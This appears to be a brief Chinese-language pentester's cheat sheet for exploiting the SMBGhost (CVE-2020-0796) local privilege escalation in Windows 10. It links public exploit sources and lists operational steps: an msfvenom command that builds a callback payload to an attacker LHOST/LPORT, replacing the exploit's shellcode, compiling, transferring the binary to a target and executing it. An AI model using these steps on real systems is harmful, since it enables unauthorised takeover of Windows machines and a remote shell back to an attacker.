SMBGhost CVE-2020-0796
Microsoft Windows 10 (1903/1909) - ‘SMBGhost’ SMB3.1.1
‘SMB2_COMPRESSION_CAPABILITIES’ Local Privilege Escalation
https://www.exploit-db.com/exploits/48267
Github
https://github.com/danigargu/CVE-2020-0796
修改载荷[可选]
生成 c# 形式的Payload, 替换.cpp里的 uint8_t shellcode[] 变量的内容
msfvenom -p Payload LHOST=X.X.X.X LPORT=X -f dll -f csharp
编译漏洞
(Github的项目可直接由Visual Studio 2019 编译,Visual Studio 2022版本需要移植项目)
复制后的文件
$ file cve-2020-0796-local.exe
cve-2020-0796-local.exe: PE32+ executable (console) x86-64, for MS Windows, 6 sections
传输 cve-2020-0796-local.exe
执行